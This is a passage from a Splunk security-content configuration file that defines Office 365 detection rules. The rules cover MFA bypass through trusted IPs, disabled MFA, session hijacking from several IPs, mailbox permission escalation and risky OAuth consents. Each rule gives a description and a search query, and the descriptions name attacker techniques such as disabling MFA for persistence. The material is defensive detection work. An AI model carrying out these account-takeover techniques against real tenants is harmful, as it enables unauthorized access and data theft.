Multi-Factor Authentication (MFA) during login. The detection leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. By monitoring these logs, the analytic captures and alerts on any addition of new trusted IPs. Adding trusted IPs to bypass MFA is a significant security concern. While there might be legitimate reasons to add trusted IPs, such as for a new office location, there's also a risk of attackers or malicious insiders using this to facilitate unauthorized access. Monitoring for changes to the trusted IP list helps ensure that any attempt to bypass MFA is legitimate and authorized. If the detection is a true positive, it suggests that users logging in from the newly added trusted IP can bypass MFA, potentially weakening the security posture of the organization. This could lead to unauthorized access, especially if the IP was added maliciously. Immediate investigation is required to validate the legitimacy of the IP addition and to assess potential security implications. action.notable.param.rule_title = O365 Bypass MFA via Trusted IP action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Set Company Information." ModifiedProperties{}.Name=StrongAuthenticationPolicy | rex max_match=100 field=ModifiedProperties{}.NewValue "(?\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | rex max_match=100 field=ModifiedProperties{}.OldValue "(?\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | eval ip_addresses_old=if(isnotnull(ip_addresses_old),ip_addresses_old,"0") | mvexpand ip_addresses_new_added | where isnull(mvfind(ip_addresses_old,ip_addresses_new_added)) |stats count min(_time) as firstTime max(_time) as lastTime values(ip_addresses_old) as ip_addresses_old by user ip_addresses_new_added Operation Workload vendor_account status user_id action | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `o365_bypass_mfa_via_trusted_ip_filter` [ESCU - O365 Compliance Content Search Exported - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets activities where the results of a content search within the Office 365 Security and Compliance Center are exported, a crucial phase in the compliance and investigative workflows. By focusing on the SearchExported operation logged under the SecurityComplianceCenter workload in the o365_management_activity, this analytic flags instances that potentially move sensitive or critical organizational data outside its original storage locations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection targets activities where the results of a content search within the Office 365 Security and Compliance Center are exported, a crucial phase in the compliance and investigative workflows. By focusing on the SearchExported operation logged under the SecurityComplianceCenter workload in the o365_management_activity, this analytic flags instances that potentially move sensitive or critical organizational data outside its original storage locations. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Compliance content searche exports may be executed for legitimate purposes, filter as needed. action.escu.creation_date = 2024-04-01 action.escu.modification_date = 2024-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Compliance Content Search Exported - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A new compliance content search export was started by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Compliance Content Search Exported - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection targets activities where the results of a content search within the Office 365 Security and Compliance Center are exported, a crucial phase in the compliance and investigative workflows. By focusing on the SearchExported operation logged under the SecurityComplianceCenter workload in the o365_management_activity, this analytic flags instances that potentially move sensitive or critical organizational data outside its original storage locations. action.notable.param.rule_title = O365 Compliance Content Search Exported action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=SecurityComplianceCenter Operation="SearchExported" | rename user_id as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, ObjectId, ExchangeLocations, user, Query |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_compliance_content_search_exported_filter` [ESCU - O365 Compliance Content Search Started - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection will trigger when a content search is initiated within the Office 365 Security and Compliance Center, a critical component in the suite's governance, risk management, and compliance (GRC) capabilities. By monitoring the SearchCreated operation within the o365_management_activity logs, specifically under the SecurityComplianceCenter workload, this analytic flags the commencement of searches across the organization's data, including emails, documents, and more, that reside in ExchangeLocations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection will trigger when a content search is initiated within the Office 365 Security and Compliance Center, a critical component in the suite's governance, risk management, and compliance (GRC) capabilities. By monitoring the SearchCreated operation within the o365_management_activity logs, specifically under the SecurityComplianceCenter workload, this analytic flags the commencement of searches across the organization's data, including emails, documents, and more, that reside in ExchangeLocations. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Compliance content searches may be executed for legitimate purposes, filter as needed. action.escu.creation_date = 2024-04-01 action.escu.modification_date = 2024-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Compliance Content Search Started - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A new compliance content search was started by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Compliance Content Search Started - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection will trigger when a content search is initiated within the Office 365 Security and Compliance Center, a critical component in the suite's governance, risk management, and compliance (GRC) capabilities. By monitoring the SearchCreated operation within the o365_management_activity logs, specifically under the SecurityComplianceCenter workload, this analytic flags the commencement of searches across the organization's data, including emails, documents, and more, that reside in ExchangeLocations. action.notable.param.rule_title = O365 Compliance Content Search Started action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=SecurityComplianceCenter Operation=SearchCreated | rename user_id as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, ObjectId, ExchangeLocations, user, Query |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_compliance_content_search_started_filter` [ESCU - O365 Concurrent Sessions From Different Ips - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identies scenarios where the same user session is accessed from multiple IP addresses. This situation typically arises in an adversary-in-the-middle (AiTM) phishing attack, where attackers compromise user sessions. The detection method involves analyzing Azure Active Directory logs for 'UserLoggedIn' operations. It focuses on identifying sessions where the number of associated IP addresses exceeds one for the same SessionId. This pattern suggests potential unauthorized concurrent access, which is atypical under normal usage scenarios. If a true positive is identified, it implies that an adversary has gained unauthorized access to a user's Office 365 account. The ramifications of this can be significant, including data theft, account takeover, and launching of internal phishing campaigns. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identies scenarios where the same user session is accessed from multiple IP addresses. This situation typically arises in an adversary-in-the-middle (AiTM) phishing attack, where attackers compromise user sessions. The detection method involves analyzing Azure Active Directory logs for 'UserLoggedIn' operations. It focuses on identifying sessions where the number of associated IP addresses exceeds one for the same SessionId. This pattern suggests potential unauthorized concurrent access, which is atypical under normal usage scenarios. If a true positive is identified, it implies that an adversary has gained unauthorized access to a user's Office 365 account. The ramifications of this can be significant, including data theft, account takeover, and launching of internal phishing campaigns. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-12-04 action.escu.modification_date = 2023-12-04 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Concurrent Sessions From Different Ips - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ has logged in with the same session id from more than one unique IP address action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "ips", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Concurrent Sessions From Different Ips - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identies scenarios where the same user session is accessed from multiple IP addresses. This situation typically arises in an adversary-in-the-middle (AiTM) phishing attack, where attackers compromise user sessions. The detection method involves analyzing Azure Active Directory logs for 'UserLoggedIn' operations. It focuses on identifying sessions where the number of associated IP addresses exceeds one for the same SessionId. This pattern suggests potential unauthorized concurrent access, which is atypical under normal usage scenarios. If a true positive is identified, it implies that an adversary has gained unauthorized access to a user's Office 365 account. The ramifications of this can be significant, including data theft, account takeover, and launching of internal phishing campaigns. action.notable.param.rule_title = O365 Concurrent Sessions From Different Ips action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoggedIn | stats min(_time) as firstTime max(_time) as lastTime values(src_ip) as ips values(user_agent) as user_agents by Operation, user, SessionId | where mvcount(ips) > 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_concurrent_sessions_from_different_ips_filter` [ESCU - O365 Disable MFA - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. The detection leverages O365 audit logs, specifically focusing on events related to MFA settings. By monitoring these logs, the analytic captures and alerts on any actions that result in the deactivation or disabling of MFA for a user. MFA is a cornerstone of modern security practices, providing an additional layer of protection beyond just a password. Disabling MFA, especially without a valid reason, poses a significant security risk. Attackers, after gaining initial access to an account, might disable MFA to ensure easier re-entry and persistence. Monitoring for such changes is crucial to detect potential security breaches and to ensure that security best practices are consistently applied. If the detection is a true positive, it indicates that a user's account is now at increased risk of unauthorized access, as the added security layer of MFA has been removed. This could be a sign of an attacker trying to maintain persistence or an insider threat. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. The detection leverages O365 audit logs, specifically focusing on events related to MFA settings. By monitoring these logs, the analytic captures and alerts on any actions that result in the deactivation or disabling of MFA for a user. MFA is a cornerstone of modern security practices, providing an additional layer of protection beyond just a password. Disabling MFA, especially without a valid reason, poses a significant security risk. Attackers, after gaining initial access to an account, might disable MFA to ensure easier re-entry and persistence. Monitoring for such changes is crucial to detect potential security breaches and to ensure that security best practices are consistently applied. If the detection is a true positive, it indicates that a user's account is now at increased risk of unauthorized access, as the added security layer of MFA has been removed. This could be a sign of an attacker trying to maintain persistence or an insider threat. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = Unless it is a special case, it is uncommon to disable MFA or Strong Authentication action.escu.creation_date = 2022-02-03 action.escu.modification_date = 2022-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Disable MFA - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = User $src_user$ has executed an operation $action$ for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Disable MFA - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. The detection leverages O365 audit logs, specifically focusing on events related to MFA settings. By monitoring these logs, the analytic captures and alerts on any actions that result in the deactivation or disabling of MFA for a user. MFA is a cornerstone of modern security practices, providing an additional layer of protection beyond just a password. Disabling MFA, especially without a valid reason, poses a significant security risk. Attackers, after gaining initial access to an account, might disable MFA to ensure easier re-entry and persistence. Monitoring for such changes is crucial to detect potential security breaches and to ensure that security best practices are consistently applied. If the detection is a true positive, it indicates that a user's account is now at increased risk of unauthorized access, as the added security layer of MFA has been removed. This could be a sign of an attacker trying to maintain persistence or an insider threat. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account. action.notable.param.rule_title = O365 Disable MFA action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Disable Strong Authentication." | stats count earliest(_time) as firstTime latest(_time) as lastTime by UserType Operation UserId ResultStatus object | rename UserType AS user_type, Operation AS action, UserId AS src_user, object AS user, ResultStatus AS result | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_disable_mfa_filter` [ESCU - O365 Elevated Mailbox Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection triggers on the assignment of elevated mailbox permissions within an Office 365 environment, specifically through the Add-MailboxPermission operation, as logged under the Exchange workload in the o365_management_activity. It is meticulously designed to spotlight instances where critical permissions such as FullAccess, ChangePermission, or ChangeOwner are granted, marking significant alterations in mailbox access controls. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = This detection triggers on the assignment of elevated mailbox permissions within an Office 365 environment, specifically through the Add-MailboxPermission operation, as logged under the Exchange workload in the o365_management_activity. It is meticulously designed to spotlight instances where critical permissions such as FullAccess, ChangePermission, or ChangeOwner are granted, marking significant alterations in mailbox access controls. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = FullAccess mailbox delegation may be assigned for legitimate purposes, filter as needed. action.escu.creation_date = 2024-03-31 action.escu.modification_date = 2024-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Elevated Mailbox Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = Elevated mailbox permissions were assigned on $dest_user$ action.risk.param._risk = [{"risk_object_field": "dest_user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Elevated Mailbox Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection triggers on the assignment of elevated mailbox permissions within an Office 365 environment, specifically through the Add-MailboxPermission operation, as logged under the Exchange workload in the o365_management_activity. It is meticulously designed to spotlight instances where critical permissions such as FullAccess, ChangePermission, or ChangeOwner are granted, marking significant alterations in mailbox access controls. action.notable.param.rule_title = O365 Elevated Mailbox Permission Assigned action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation=Add-MailboxPermission | search (AccessRights=FullAccess OR AccessRights=ChangePermission OR AccessRights=ChangeOwner) | rename Identity AS dest_user | stats count earliest(_time) as firstTime latest(_time) as lastTime by user dest_user Operation AccessRights |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_elevated_mailbox_permission_assigned_filter` [ESCU - O365 Excessive Authentication Failures Alert - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects when an excessive number of authentication failures occur this search also includes attempts against MFA prompt codes action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search detects when an excessive number of authentication failures occur this search also includes attempts against MFA prompt codes action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = The threshold for alert is above 10 attempts and this should reduce the number of false positives. action.escu.creation_date = 2022-02-18 action.escu.modification_date = 2022-02-18 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Excessive Authentication Failures Alert - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ has caused excessive number of authentication failures from $src_ip$ using UserAgent $UserAgent$. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Excessive Authentication Failures Alert - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory UserAuthenticationMethod=* status=failure | stats count earliest(_time) AS firstTime latest(_time) AS lastTime values(UserAuthenticationMethod) AS UserAuthenticationMethod values(UserAgent) AS UserAgent values(status) AS status values(src_ip) AS src_ip by user | where count > 10 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_authentication_failures_alert_filter` [ESCU - O365 Excessive SSO logon errors - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects accounts with high number of Single Sign ON (SSO) logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects accounts with high number of Single Sign ON (SSO) logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = Logon errors may not be malicious in nature however it may indicate attempts to reuse a token or password obtained via credential access attack. action.escu.creation_date = 2023-08-02 action.escu.modification_date = 2023-08-02 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Excessive SSO logon errors - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover", "Cloud Federated Credential Abuse"] action.risk = 1 action.risk.param._risk_message = Excessive number of SSO logon errors from $src_ip$ using UserAgent $user_agent$. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Excessive SSO logon errors - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover", "Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso* Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip signature user_agent authentication_service action| where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter` [ESCU - O365 File Permissioned Application Consent Granted by User - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where a user in the Office 365 environment grants consent to an application that requests file permissions, specifically targeting OneDrive or SharePoint. Such permissions mean the application could potentially access, modify, or delete files stored within these services. The detection process leverages O365 audit logs, particularly focusing on events related to OAuth application consents. By examining these logs, the analytic is designed to capture and alert on any actions where users grant consent to applications requesting file-related permissions for OneDrive or SharePoint. The sensitivity of file permissions, especially in platforms as widely utilized as OneDrive and SharePoint, cannot be overstated. While many legitimate applications might require such permissions to operate, there's an inherent risk with malicious or overly permissive applications. Attackers could craft or exploit applications to gain file permissions, aiming to access, exfiltrate, or manipulate sensitive data housed in OneDrive or SharePoint. It's crucial for security operations centers to monitor these consents to ensure that only trustworthy applications gain access and that users aren't inadvertently granting permissions to potentially harmful applications. If this detection flags a true positive, it indicates that an application has been granted permissions that could allow it to interact with OneDrive or SharePoint files in potentially malicious ways. Such actions could lead to data breaches, data loss, or unauthorized data manipulation. Immediate investigation would be required to validate the application's legitimacy, understand the nature of its requested permissions, and assess the potential risks associated with the access it's been granted. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies instances where a user in the Office 365 environment grants consent to an application that requests file permissions, specifically targeting OneDrive or SharePoint. Such permissions mean the application could potentially access, modify, or delete files stored within these services. The detection process leverages O365 audit logs, particularly focusing on events related to OAuth application consents. By examining these logs, the analytic is designed to capture and alert on any actions where users grant consent to applications requesting file-related permissions for OneDrive or SharePoint. The sensitivity of file permissions, especially in platforms as widely utilized as OneDrive and SharePoint, cannot be overstated. While many legitimate applications might require such permissions to operate, there's an inherent risk with malicious or overly permissive applications. Attackers could craft or exploit applications to gain file permissions, aiming to access, exfiltrate, or manipulate sensitive data housed in OneDrive or SharePoint. It's crucial for security operations centers to monitor these consents to ensure that only trustworthy applications gain access and that users aren't inadvertently granting permissions to potentially harmful applications. If this detection flags a true positive, it indicates that an application has been granted permissions that could allow it to interact with OneDrive or SharePoint files in potentially malicious ways. Such actions could lead to data breaches, data loss, or unauthorized data manipulation. Immediate investigation would be required to validate the application's legitimacy, understand the nature of its requested permissions, and assess the potential risks associated with the access it's been granted. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = OAuth applications that require file permissions may be legitimate, investigate and filter as needed. action.escu.creation_date = 2023-10-18 action.escu.modification_date = 2023-10-18 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 File Permissioned Application Consent Granted by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ consented an OAuth application that requests file-related permissions. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 File Permissioned Application Consent Granted by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where a user in the Office 365 environment grants consent to an application that requests file permissions, specifically targeting OneDrive or SharePoint. Such permissions mean the application could potentially access, modify, or delete files stored within these services. The detection process leverages O365 audit logs, particularly focusing on events related to OAuth application consents. By examining these logs, the analytic is designed to capture and alert on any actions where users grant consent to applications requesting file-related permissions for OneDrive or SharePoint. The sensitivity of file permissions, especially in platforms as widely utilized as OneDrive and SharePoint, cannot be overstated. While many legitimate applications might require such permissions to operate, there's an inherent risk with malicious or overly permissive applications. Attackers could craft or exploit applications to gain file permissions, aiming to access, exfiltrate, or manipulate sensitive data housed in OneDrive or SharePoint. It's crucial for security operations centers to monitor these consents to ensure that only trustworthy applications gain access and that users aren't inadvertently granting permissions to potentially harmful applications. If this detection flags a true positive, it indicates that an application has been granted permissions that could allow it to interact with OneDrive or SharePoint files in potentially malicious ways. Such actions could lead to data breaches, data loss, or unauthorized data manipulation. Immediate investigation would be required to validate the application's legitimacy, understand the nature of its requested permissions, and assess the potential risks associated with the access it's been granted. action.notable.param.rule_title = O365 File Permissioned Application Consent Granted by User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Consent to application." ResultStatus=Success | eval admin_consent =mvindex('ModifiedProperties{}.NewValue', 0) | search admin_consent=False | eval permissions =mvindex('ModifiedProperties{}.NewValue', 4) | rex field=permissions "Scope: (?[^,]+)" | makemv delim=" " Scope | search Scope IN ("Files.Read", "Files.Read.All", "Files.ReadWrite", "Files.ReadWrite.All", "Files.ReadWrite.AppFolder") | stats max(_time) as lastTime values(Scope) by Operation, user, object, ObjectId | `security_content_ctime(lastTime)` | `o365_file_permissioned_application_consent_granted_by_user_filter` [ESCU - O365 FullAccessAsApp Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic triggers on the assignment of the 'full_access_as_app' permission to an application registration in Office 365, specifically within Exchange Online. The 'full_access_as_app' permission, identified by its GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', allows an application extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. The analytic focuses on the ResourceAppId '00000002-0000-0ff1-ce00-000000000000', pinpointing permissions granted to the Office 365 Exchange Online resource. By analyzing Office 365 management activity logs and filtering Azure Active Directory workload events, the query detects when this specific permission is assigned. Monitoring this assignment is vital due to the broad access it provides, which can lead to unauthorized data access or exfiltration if misused. A true positive detection requires immediate attention to prevent potential security risks like account compromise or data loss. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", 